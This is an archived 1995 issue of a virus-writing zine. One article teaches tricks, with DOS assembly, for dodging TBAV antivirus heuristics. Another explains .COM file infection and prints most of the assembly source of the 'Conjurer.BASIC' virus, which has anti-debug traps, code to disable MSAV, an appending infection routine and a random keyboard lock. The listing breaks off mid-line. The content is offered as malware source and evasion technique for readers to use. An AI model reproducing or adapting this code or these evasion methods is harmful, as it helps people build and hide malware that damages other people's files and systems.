💾 Archived View for spam.works › mirrors › textfiles › virus › ivm-95.1 captured on 2023-06-16 at 21:03:12.
-=-=-=-=-=-=-
------------------------------Immortal Virus Magazine-------------------------
-----------------------------------Issue 95.1----------------------------------
-----------------------------TBAV fooling techiniques--------------------------
The heuristic scans we will discuss are:
- F : Suspicious file-access
- S : Search for .EXE / .COM files
- D : Direct disk access
- # : Encryption and/or debugger trap
- G : Grabage instructions
- E : Flexible entrypoint
-------------------------------------------------------------------------------
- F : Suspicious file-access
There are different ways to fool TBAV on this one.
1.) The easiest way is to add 10 or something at the MOVe instruction
and then SUBstract 10: TBAV will think you use the original MOVe.
e.g: MOV AH, 50h
SUB AH, 10h ;50h will turn into 40h Dos fnc: Write
INT 21h
2.) This is a bit tougher, you redirect int 21h to some other unused
interrupt. There is no need to unlink the new interrupt.
e.g: MOV AX, 3521h ;Get dos int address in ES:BX
INT 21H
PUSH ES ;DS == ES
POP DS
MOV AX, 2560h ;Int 60H will become int 21h
INT 21h
MOV AH, 40h ;Dos fnc: Write
INT 60h ;The new interrupt
-------------------------------------------------------------------------------
- S : Search for .EXE / .COM files
There are again a few ways to fool TBAV on this one.
1.) Somewhere in your virus is a filespec (e.g. '*.COM'), just change the
'*' into something else ('Z.COM') and when the function 3Fh or something
is called change it to a '*' again, afterwards change it to a 'Z' again.
e.g: MOV BYTE PTR [FSPC+BP],'*'
MOV AX,3F00h
INT 21h
MOV BYTE PTR [FSPC+BP],'Z'
FSPC DB 'Z.COM',0
2.) You can also use the first technique about hiding the 'F' flag.
-------------------------------------------------------------------------------
- D : Direct disk access
Once again there are a few ways to let TBAV eat his 'D' flag.
1.) Change the INT 26h realtime: Create a label or something and put
an int 21h or something, and change it to int 26h in your virus.
e.g. MOV BYTE PTR [I26L+1+BP],26h ;Change INT 21h to INT 26h
I26L: INT 21h ;Here will be the INT 26h
MOV BYTE PTR [I26L+1+BP],21h ;Change INT 26h to INT 21h
2.) You can also use the second technique about hiding the 'F' flag.
-------------------------------------------------------------------------------
- # : Encryption and/or debugger trap
Once again there are several ways to shit TBAV.
1.) For a debugger trap you can use the first techinique about the 'F' flag.
2.) Use an unlogic call stucture. First CALL the decryption routine, then
JuMP to the main virus.
e.g. CALL DC ;Call your decryption routine
JMP ST ;JuMP to the start of your virus
NOP ;To fool TBAV
ST: . ;Put your virus here
.
.
DC: RET ;Put the decryption routine here!
-------------------------------------------------------------------------------
- G : Garbage instructions
There's one thing to do to get rid of this flag.
OPTIMIZE!
e.g. You can turn turn two nops into two eXCHanGes:
NOP
NOP
will be:
XCHG AX,BX
XCHG CX,AX
or something like that.
You can also put often used routines in a CALL routine (e.g. Get Time,etc)
-------------------------------------------------------------------------------
- E : Flexible entry-point
There are many ways to avoid this, the best one is to put this little
routine at the beginning of your virus:
XCHG AX,BX ;Avoid 'G' & 'E' flags
XCHG CX,AX
CALL DELTA
DELTA: POP BP
SUB BP, OFFSET DELTA
Entrypoint will be in BP
-------------------------------------------------------------------------------
By: [Hacking Hell]------------------------------Immortal Virus Magazine-------------------------
-----------------------------------Issue 95.1----------------------------------
--------------------------The basics of a .COM infector------------------------
We'll begin with the search .COM routine of a virus.
The best way is to to use function 4Eh & 4Fh.
- Function 4Eh Find First file
Inputs: It needs a DTA set.
DS:DX = Filespec
BX = Attribute
Outputs: DTA + 1Eh = Filename + 0 byte
- Function 4Fh Find next file
Inputs: By function 4Eh or 4Fh pre-initiated DTA
Outputs: DTA + 1Eh = Filename + 0 byte
Now, the implementation technique.
I think the best way is to make a four byte jump table and an original bytes
table, the jump table exists out of an 0E9h byte, two 00h bytes and an
identification byte (eg. DB 0E9h,00h,00h,'C'), in the original bytes
table the first four bytes will be stored. First read the original bytes,
store then in the org. bytes table, append then virus at the end, calculate
the jump offset, place them in the jump table, write the jump table at the
beginning of the victim file.
- Function 3Dh Open file
Inputs: AL = Mode ( 02h = Random access )
DS:DX = Filename ( eg. DTA + 1Eh )
Outputs: AX = File-handle ( eXCHanGe to BX for other functions )
- Function 3Fh Read from file
Inputs: CX = Bytes to read
DS:DX = Destination of read
BX = File-handle
- Function 42h Set file-pointer
AL = Mode ( 00h = From SOF / 02h = From EOF)
DX:CX = Offset in file (0:0 for SOF / EOF)
- Function 40h Write into file
CX = Bytes to write
DS:DX = Offset of data to write
BX = File-handle
- Function 3Eh Close file
BX = File-handle
Now here follows the assembly source and a debug script of the Conjurer Basic
virus, created by [Hacking Hell] & [Cyborg], it's 270 bytes large and a good
example virus for the techniques you may have learned...
-------------------------------------<CUT>-------------------------------------
; Conjurer.BASIC virus...
%OUT CoNJuReR.BASIC virus by [Hacking Hell] & [Cyborg]
%OUT Appending non-descructive non-resident non-flagged virus.
%OUT Features:
%OUT - Anti trace meganism
%OUT - 99% TBAV proof (almost no flags)
%OUT - Traversal (DotDot technique)
%OUT - Little message
%OUT - 13% chance for a keyboard lock
.model tiny
.code
ORG 100h ;COM file remember?!?
dummy: db 0e9h,02h,00h ;The dummy host: jump to START
db 'C' ;Already infected marker
ret ;Exit from dummy
start: push cx ;Some junk to fool TBAV
pop bx
mov ax,0fa01h ;Let's take down MSAV!!!
mov dx,05945h
int 16h
call getdlt ;Nice way to get delta offset!
realst:
getdlt: pop bp
sub bp, offset getdlt
call encdec
jmp codest
nop ;TBAV eats '#'
codest: lea si,[orgbts+bp] ;Restore first 4 bytes
mov di,0100h
movsw
movsw
push cs ;DS <==> CS
pop ds
lea dx,[eov+bp] ;Set DTA address
mov ah,1ah
int 21h
mov ax,3501h ;Crash INT 1
sub ah,10h
mov bx,0000h
mov es,bx
int 21h
mov al,03h ;Crash INT 3
int 21h
mov ah,2ch ;13% chance to lock keyboard!
int 21h
cmp dl, 0dh
jg nolock
lockkb: mov al,82h ;Keyboard lock!
out 21h,al
nolock: mov ah,2ch ;50% chance to print message!
int 21h
cmp dl,32h
jl spread
mov ah,09h ;Bingo! print message!
lea dx, [bp+offset welcome]
int 21h
mov ah,00h ;Wait for a key!
int 16h
jmp spread
welcome db 'CoNJuReR.BSC!',07h,0ah,0dh,'